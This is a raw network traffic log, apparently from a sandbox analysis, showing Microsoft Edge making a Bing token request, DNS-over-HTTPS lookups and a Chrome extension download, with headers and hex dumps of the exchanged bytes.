                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                      nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                      report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://bzib.nelreports.net/api/report?cat=bingbusiness"}]}
                                                                                                                                                      X-Cache: CONFIG_NOCACHE
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      X-MSEdge-Ref: Ref A: BE10A74C1B554F478C96DEA73DC42F70 Ref B: BL2AA2010203029 Ref C: 2024-12-04T12:58:17Z
                                                                                                                                                      Set-Cookie: MUIDB=38638FA1CC43627709F99AEACDCF631B; path=/; httponly; expires=Mon, 29-Dec-2025 12:58:17 GMT
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:17 GMT
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-04 12:58:17 UTC584INData Raw: 7b 22 74 65 6e 61 6e 74 53 65 74 74 69 6e 67 73 22 3a 7b 22 66 72 69 65 6e 64 6c 79 4e 61 6d 65 22 3a 22 22 2c 22 74 65 6e 61 6e 74 4f 62 6a 65 63 74 49 64 22 3a 22 22 2c 22 74 65 6e 61 6e 74 49 64 22 3a 22 22 2c 22 74 65 6e 61 6e 74 44 69 73 70 6c 61 79 4e 61 6d 65 22 3a 22 22 2c 22 69 63 6f 6e 4c 61 72 67 65 22 3a 22 22 2c 22 69 63 6f 6e 4c 61 72 67 65 43 68 65 63 6b 73 75 6d 22 3a 22 22 2c 22 74 68 65 6d 65 22 3a 22 22 2c 22 61 64 6d 69 6e 45 6d 61 69 6c 22 3a 22 22 2c 22 69 63 6f 6e 4c 61 72 67 65 49 73 44 65 66 61 75 6c 74 22 3a 66 61 6c 73 65 2c 22 74 65 6e 61 6e 74 47 72 6f 75 70 22 3a 22 22 2c 22 73 74 61 74 75 73 22 3a 22 43 6f 6d 70 6c 65 74 65 22 2c 22 76 61 72 69 61 6e 74 73 22 3a 5b 5d 2c 22 65 78 70 6c 6f 72 65 51 75 65 72 69 65 73 22 3a 5b
                                                                                                                                                      Data Ascii: {"tenantSettings":{"friendlyName":"","tenantObjectId":"","tenantId":"","tenantDisplayName":"","iconLarge":"","iconLargeChecksum":"","theme":"","adminEmail":"","iconLargeIsDefault":false,"tenantGroup":"","status":"Complete","variants":[],"exploreQueries":[


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      1192.168.2.44973513.107.9.1584438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:17 UTC418OUTGET /api/v1/user/token/microsoftgraph?&clienttype=edge-omnibox HTTP/1.1
                                                                                                                                                      Host: business.bing.com
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                      2024-12-04 12:58:17 UTC801INHTTP/1.1 401 Unauthorized
                                                                                                                                                      Cache-Control: max-age=0, no-cache, no-store, must-revalidate
                                                                                                                                                      WWW-Authenticate: Bearer
                                                                                                                                                      WWW-Authenticate: Bearer
                                                                                                                                                      WWW-Authenticate: Bearer error="invalid_token"
                                                                                                                                                      WWW-Authenticate: Bearer error="invalid_token"
                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                      X-Cache: CONFIG_NOCACHE
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      X-MSEdge-Ref: Ref A: 313502D7E0504D4AA959504409AC4F3A Ref B: BL2AA2030102033 Ref C: 2024-12-04T12:58:17Z
                                                                                                                                                      Set-Cookie: MUIDB=08D13D0AFA4A64C22EE82841FB4B658E; path=/; httponly; expires=Mon, 29-Dec-2025 12:58:17 GMT
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:16 GMT
                                                                                                                                                      Connection: close
                                                                                                                                                      Content-Length: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      2192.168.2.449752172.64.41.34438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:20 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Content-Length: 128
                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                      Accept-Language: *
                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                      2024-12-04 12:58:20 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                      2024-12-04 12:58:20 UTC247INHTTP/1.1 200 OK
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:20 GMT
                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                      Connection: close
                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                      Content-Length: 468
                                                                                                                                                      CF-RAY: 8ecbf7a51bf1c340-EWR
                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                      2024-12-04 12:58:20 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f8 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii: wwwgstaticcom))


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      3192.168.2.449751162.159.61.34438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:20 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Content-Length: 128
                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                      Accept-Language: *
                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                      2024-12-04 12:58:20 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                      2024-12-04 12:58:20 UTC247INHTTP/1.1 200 OK
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:20 GMT
                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                      Connection: close
                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                      Content-Length: 468
                                                                                                                                                      CF-RAY: 8ecbf7a528d043eb-EWR
                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                      2024-12-04 12:58:20 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 22 00 04 8e fa 40 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii: wwwgstaticcom"@c)


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      4192.168.2.449750172.64.41.34438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:20 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Content-Length: 128
                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                      Accept-Language: *
                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                      2024-12-04 12:58:20 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                      2024-12-04 12:58:20 UTC247INHTTP/1.1 200 OK
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:20 GMT
                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                      Connection: close
                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                      Content-Length: 468
                                                                                                                                                      CF-RAY: 8ecbf7a52b78c46d-EWR
                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                      2024-12-04 12:58:20 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1e 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                      Data Ascii: wwwgstaticcom))


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      5192.168.2.449746172.217.21.334438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:20 UTC594OUTGET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1
                                                                                                                                                      Host: clients2.googleusercontent.com
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                      2024-12-04 12:58:20 UTC573INHTTP/1.1 200 OK
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Content-Length: 138356
                                                                                                                                                      X-GUploader-UploadID: AFiumC4zguC1N2OoYvoWLQ0cu2RPKe8uy19z4e0qz1SHqzyWr-9u1SCFcFmkwldbkessZiknB2rBVNm9eQ
                                                                                                                                                      X-Goog-Hash: crc32c=ld9IFg==
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Date: Tue, 03 Dec 2024 16:45:00 GMT
                                                                                                                                                      Expires: Wed, 03 Dec 2025 16:45:00 GMT
                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                      Age: 72800
                                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT
                                                                                                                                                      ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41
                                                                                                                                                      Content-Type: application/x-chrome-extension
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-04 12:58:20 UTC817INData Raw: 43 72 32 34 03 00 00 00 e0 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                      Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                      2024-12-04 12:58:20 UTC1390INData Raw: 5f b2 be 56 5f e7 71 3a 5f 86 5f 7f f9 35 7d d5 75 53 5c 9b ff 18 eb af ff 78 3f ab fa d7 9f 7e 5d cf 1f 43 2d ff b3 ba 0c 53 3d 4c bf fe f2 f7 5f 63 f1 50 97 42 ea cf d7 8f b0 2d 4d db 10 dc 36 32 b3 69 2a b3 51 d5 e3 f8 c4 ad eb 39 ef e7 ef dc 9c de 2b 53 3d 89 f4 f8 84 0e 2f 36 3a df cf c2 57 83 c8 90 71 6c 2f 67 fd f9 26 6a a9 79 fc f9 7b af ae 22 8b ce b1 9a fe 7c 1c dc 46 fa 1f e7 f8 7c 9c a3 f6 e3 56 f9 f6 f0 f3 99 aa 77 be 25 74 2e 79 86 2e 3f df 17 26 e2 e2 61 cc 9c 7f 3c d2 6e c2 88 c1 89 f6 53 2b 7c d4 17 3d 05 72 61 c7 0a 84 08 01 b1 27 7d f8 28 82 70 57 fb c2 16 8f d0 39 05 d7 73 e5 43 a3 d8 1f 9f 8e ca b9 96 26 6a 4a 9f 2d 27 13 f6 27 13 a8 ca 42 8d 30 f5 75 3f 2e a5 b9 3b 9f f6 e1 a3 34 9d 7f cf f3 e7 d9 c2 b9 f0 d4 c0 ac e6 90 42 86 4e 5c
                                                                                                                                                      Data Ascii: _V_q:__5}uS\x?~]C-S=L_cPB-M62i*Q9+S=/6:Wql/g&jy{"|F|Vw%t.y.?&a<nS+|=ra'}(pW9sC&jJ-''B0u?.;4BN\
                                                                                                                                                      2024-12-04 12:58:21 UTC1390INData Raw: 8e b5 a1 c8 fb ee 81 60 65 eb 98 45 ab ec b5 f7 df 38 3e ce 17 36 8b 4c d7 7b 85 4d 64 18 16 65 b0 90 1e f2 cb 03 4c 8a 00 e1 48 79 96 ec 9b 3d f6 a0 d6 80 10 57 0f 10 60 43 7e af 8e 3f 1c b7 7a ee 1d 59 c2 29 1a 94 12 c6 ec 9e 28 ba 47 74 ea a9 92 fb f2 20 bd f4 20 c3 8a 8a 04 03 ec 56 83 d6 68 aa f5 88 d1 39 0a d6 d7 be fa 7f 68 70 d5 e2 31 37 1a 25 03 f1 55 98 2a 4b bd 68 22 81 eb 25 ad 18 84 19 e6 b8 d7 a1 60 b9 67 e1 89 9c f6 e2 ad 52 d0 c5 a6 dc ad e7 9e dc ca 7f d2 3e 77 87 7d e1 a1 a5 e9 a4 17 9a 04 c0 1e 05 42 14 c6 78 22 8b d6 00 1f f3 28 78 31 13 f3 7e 67 01 4e 72 8a 0f 75 ff 71 5f e5 6f 6d cd bd d1 43 0a 76 99 35 be 4a e5 2d 31 6c 3a 02 10 c5 56 13 ea 1e 23 15 1d 58 74 af 43 75 3d f0 13 03 bc 22 a2 fc ca 82 66 b9 ee fd 2e c5 46 f6 b8 53 d7 bc
                                                                                                                                                      Data Ascii: `eE8>6L{MdeLHy=W`C~?zY)(Gt Vh9hp17%U*Kh"%`gR>w}Bx"(x1~gNruq_omCv5J-1l:V#XtCu="f.FS
                                                                                                                                                      2024-12-04 12:58:21 UTC1390INData Raw: eb 3e aa 67 36 b6 c2 7d dd cf 6f 71 6a 3c aa 40 7e 15 06 ce 18 81 87 14 8e b0 58 44 27 7a dd 77 ac b1 b7 dc 66 ab cf 89 e9 ce a6 3c ec 05 3f 02 02 d8 27 ea 46 4f 70 bb e1 2d 44 84 4e 09 f6 ed 1b e9 1b c5 3d 68 a6 0c d9 75 0f 3f b1 8e cd 35 f6 95 bf 91 bd 1a 69 d1 42 51 b5 ee b9 e2 ce 89 50 6c 26 16 de 89 5e bc e6 c4 fd 26 da f5 e3 ce 69 10 77 1e cc c8 01 e9 9e 41 6a 55 a0 38 bc ac b1 bf 6b be 7b ba 51 77 aa c0 9b 05 fc b0 44 37 6a e6 e1 c0 0e 78 4a 7b 14 13 4f eb 10 ed ee 3f fb 8d c4 1f af b9 25 7e f2 af cb 87 f0 11 f9 c7 c7 ff c1 df c8 80 4b b7 c6 3f 03 ce 51 66 ae c1 bd e9 35 31 9c a0 54 88 27 0b eb 52 98 2c 14 76 36 e7 d3 53 74 70 f3 94 48 50 51 74 c1 6a 6c c5 02 57 75 bf ea 37 d6 5c 85 75 ff 1a de 92 f6 c3 8e 3c db 2b f4 fc 0a bf 49 4b a8 ce 14 7e 00
                                                                                                                                                      Data Ascii: >g6}oqj<@~XD'zwf<?'FOp-DN=hu?5iBQPl&^&iwAjU8k{QwD7jxJ{O?%~K?Qf51T'R,v6StpHPQtjlWu7\u<+IK~
                                                                                                                                                      2024-12-04 12:58:21 UTC1390INData Raw: 48 3f c7 20 98 a3 4a ae e7 0e 9d 1f 06 63 15 24 ff cb b8 61 7b a2 4e 58 74 c0 4c 09 86 ba 97 48 e8 03 c4 a9 0f ee 35 65 bd 60 e1 21 a1 18 44 a6 bd 68 e1 33 23 9a dc 91 a1 d2 1c 38 bf d3 98 ca 64 0f d9 ab 56 8f 6d 95 56 f8 a5 e3 ec 3d ef d5 2d b3 5c 3d e6 ff 3a fe 0d 19 c0 60 d4 b8 23 8f b9 88 da a3 ee df 88 f6 ec a7 9c 21 9f 2e 21 cc 81 f2 75 fd ed 12 f6 f3 fe 52 6a 9f db f0 a2 fb e9 a7 81 d4 f7 eb f5 58 53 9e 25 3f f7 32 7e 98 ff 3b 96 ae c7 fe 9f e7 2d df ff f0 9c e5 bf be 3b 4a 9f 4d 99 a9 ba 7f 9d 95 6c 74 8c da b7 42 c7 85 e0 d3 bd e4 8e ca 4d fb 56 f6 ea 5a f6 b6 f6 9f f3 77 e9 37 5f 85 df 9d ff fb bb 96 8e e7 01 8d 3f b9 f3 73 16 f3 d4 7e 18 a7 d6 fb f9 ff 5d c7 97 a1 e3 ee bb 84 8e a9 59 2c 05 d7 fa d6 5e e6 f7 e4 df 87 46 8b e9 f6 55 5f 7f fd e5
                                                                                                                                                      Data Ascii: H? Jc$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
                                                                                                                                                      2024-12-04 12:58:21 UTC1390INData Raw: 50 3d 5b 7f a3 9a c1 c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51
                                                                                                                                                      Data Ascii: P=[C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8Q
                                                                                                                                                      2024-12-04 12:58:21 UTC1390INData Raw: ee 12 87 56 cb 68 4b 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13
                                                                                                                                                      Data Ascii: VhKn=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2|}nK+,\]Q|Em:aox/cl &ud]p;MJW4M@
                                                                                                                                                      2024-12-04 12:58:21 UTC1390INData Raw: 8f 15 60 c1 98 b9 ab 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7
                                                                                                                                                      Data Ascii: `cc8*6D*<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6
                                                                                                                                                      2024-12-04 12:58:21 UTC1390INData Raw: 3f a2 77 74 f9 39 14 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73
